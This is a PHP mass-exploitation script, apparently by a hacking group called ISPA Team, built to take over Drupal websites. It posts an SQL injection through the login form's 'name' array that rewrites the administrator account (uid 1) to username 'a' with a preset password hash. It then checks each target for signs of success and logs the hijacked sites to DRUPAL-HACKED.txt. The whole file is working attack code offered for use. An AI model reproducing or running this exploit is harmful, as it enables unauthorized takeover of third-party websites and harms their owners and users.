<h1 style="color: red; font-family: Andalus;"><small><small>--ISPA Tools || by :

1. <h1 style="color: red; font-family: Andalus;"><small><small>--ISPA Tools || by : General Deir Ezour---</small></small></h1>
2. <h1 style="color: red; font-family: Andalus;"><small><small>--https://www.facebook.com/ISPA.Team--</small></small></h1>
3. <body background="http://store1.up-00.com/2016-09/1474209717491.jpg">
4. <?php
5. echo'<form method="POST" action="">
6. <textarea name="urls" cols="50" rows="16" placeholder="Put The Website Here ex : http://wwww.site.com" ></textarea><br>
7. <input type="submit" name="submit" value="submit">
8. </form>
9. ';
10. $urls = $_POST['urls'];
11. $sites = explode("\r\n",$urls);
12. foreach($sites as $url){
13. $url =trim($url);
14.  
15. $file = fopen("DRUPAL-HACKED.txt", "a");
16. error_reporting(0);
17. if (isset($_POST['submit'])) {
18. //$url = $_POST['url'];
19. $post_data = "name[0;update users set name %3D 'a' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
20. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
21. ", 'content' => $post_data));
22. $ctx = stream_context_create($params);
23. $data = file_get_contents($url . '/user/login/', null, $ctx);
24. echo "<h4>Scanning at \"/user/login/</h4>\"";
25. if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
26. $fp = fopen("DRUPAL-HACKED.txt", 'a');
27. echo "Success! User:a Pass:admin at {$url}/user/login <br>";
28. echo '<font color="#00FF66">Finished scanning. check => </font><a href="/DRUPAL-HACKED.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
29. echo "<br>---------------------------------------------------------------------------------------<br>";
30. fwrite($fp, "Succes! User:a Pass:admin -> {$url}/user/login");
31. fwrite($fp, "
32. ");
33. fwrite($fp, "=====================================ISPA-Team==========================================================");
34. fwrite($fp, "
35. ");
36. fclose($fp);
37. } else {
38. echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
39. }
40. }
41. if (isset($_POST['submit'])) {
42. //$url = "http://" . $_GET['url'] . "/";
43. $post_data = "name[0;update users set name %3D 'a' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
44. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
45. ", 'content' => $post_data));
46. $ctx = stream_context_create($params);
47. $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
48. echo "<h4>Scanning at \"Index</h4>\"";
49. if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
50. $fp = fopen("DRUPAL-HACKED.txt", 'a');
51. echo "Success! User:a Pass:admin at {$url}/user/login <br>";
52. echo '<font color="#00FF66">Finished scanning. check => </font><a href="/DRUPAL-HACKED.txt" target="_blank">[ DRUPAL-HACKED.txt ]</a></font> ';
53. echo "<br>======================================================================================<br>";
54. fwrite($fp, "Success! User:a Pass:admin -> {$url}/user/login");
55. fwrite($fp, "
56. ");
57. fwrite($fp, "======================================ISPA-Team===========================================================");
58. fwrite($fp, "
59. ");
60. fclose($fp);
61. } else {
62. echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
63. echo "<br>======================================================================================<br>";
64. }
65. }
66. //==========
67. }// end foreach
68.  
69.  
70. ?>